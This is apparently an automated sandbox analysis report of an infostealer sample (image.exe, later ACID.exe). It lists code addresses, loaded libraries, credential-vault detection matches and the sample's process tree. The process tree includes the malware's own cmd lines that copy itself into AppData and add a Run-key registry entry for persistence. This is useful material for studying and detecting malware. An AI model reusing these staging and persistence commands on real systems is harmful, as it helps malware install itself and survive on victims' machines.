Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09720A38
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0972BDC0
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0972BDBC
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_098AABC4
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_098AD548
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_098AD558
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09AF0AB8
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09AF0040
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0B2F2B00
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0B2F4066
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0B2F2AF0
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_0B2F9410
Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_09AF0A94
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_013E8278
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_013E75A0
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_055708D8
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_05578E21
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_078FD788
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_078FD798
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_078FAC6C
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07A20648
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07A2BF78
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07A2063B
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07A205D8
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07A2A528
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07C50638
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07C57CB8
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07C5A430
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07C5B9C0
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07C5B9AF
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_07C5F558
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08360040
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_0836E440
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_0836E3D5
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08524048
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_085228E0
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_0852E168
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_085289E5
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_0852A248
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08524A99
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08524350
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08520040
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08523878
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08523867
Source: C:\Users\user\AppData\Roaming\ACID.exe | Code function: 15_2_08520006
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852403815_2_08524038
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085228CF15_2_085228CF
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852849815_2_08528498
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852848815_2_08528488
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08527D5815_2_08527D58
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08527D6815_2_08527D68
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08528A5015_2_08528A50
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852321015_2_08523210
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852320015_2_08523200
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08524AA615_2_08524AA6
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852434115_2_08524341
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08527F6115_2_08527F61
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852679015_2_08526790
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08522B8015_2_08522B80
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085267A015_2_085267A0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BA57115_2_085BA571
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BBE5015_2_085BBE50
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B9E4815_2_085B9E48
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B823A15_2_085B823A
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BAF4215_2_085BAF42
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B000615_2_085B0006
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BCCF815_2_085BCCF8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BD8F015_2_085BD8F0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BCCE815_2_085BCCE8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BD8E015_2_085BD8E0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BBD5815_2_085BBD58
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BE19815_2_085BE198
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B9D9115_2_085B9D91
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BE18815_2_085BE188
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BE5B815_2_085BE5B8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B920915_2_085B9209
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BC29015_2_085BC290
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BDF5015_2_085BDF50
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BDF6015_2_085BDF60
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BDBE015_2_085BDBE0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BA78815_2_085BA788
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0836001515_2_08360015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_01704BF816_2_01704BF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_0170BD2816_2_0170BD28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_0170BDDA16_2_0170BDDA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_01703FE016_2_01703FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_0170432816_2_01704328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8525816_2_06D85258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8312016_2_06D83120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D87A2016_2_06D87A20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8E44816_2_06D8E448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8C22016_2_06D8C220
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8734016_2_06D87340
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8004016_2_06D80040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8000716_2_06D80007
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\watchdog.exe 2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                    Source: image.exe, 00000000.00000002.2378327661.0000000002C39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAstronot plart.exe> vs image.exe
                    Source: image.exe, 00000000.00000002.2390999485.00000000060C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHPzFG9.dll" vs image.exe
                    Source: image.exe, 00000000.00000002.2376546922.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs image.exe
                    Source: image.exe, 00000000.00000002.2396428280.0000000006F40000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameHPzFG9.dll" vs image.exe
                    Source: image.exe, 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHPzFG9.dll" vs image.exe
                    Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename71f02793-8af6-4f2d-86f0-bff8bc757609.exe4 vs image.exe
                    Source: image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename71f02793-8af6-4f2d-86f0-bff8bc757609.exe4 vs image.exe
                    Source: image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAstronot plart.exe> vs image.exe
                    Source: image.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: image.exe, Ec91Lr.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: ACID.exe, 0000000F.00000002.3441640640.00000000011EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/10@3/4
                    Source: C:\Users\user\Desktop\image.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\image.exe.log
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | File created: C:\Users\user\AppData\Local\Temp\watchdog.txt
                    Source: image.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: image.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\image.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: image.exe | ReversingLabs: Detection: 34%
                    Source: C:\Users\user\Desktop\image.exe | File read: C:\Users\user\Desktop\image.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\image.exe "C:\Users\user\Desktop\image.exe"
                    Source: C:\Users\user\Desktop\image.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
                    Source: C:\Users\user\Desktop\image.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\ACID.exe "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Process created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe"
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Process created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe"
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\image.exe | Section loaded: windowscodecs.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\ACID.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
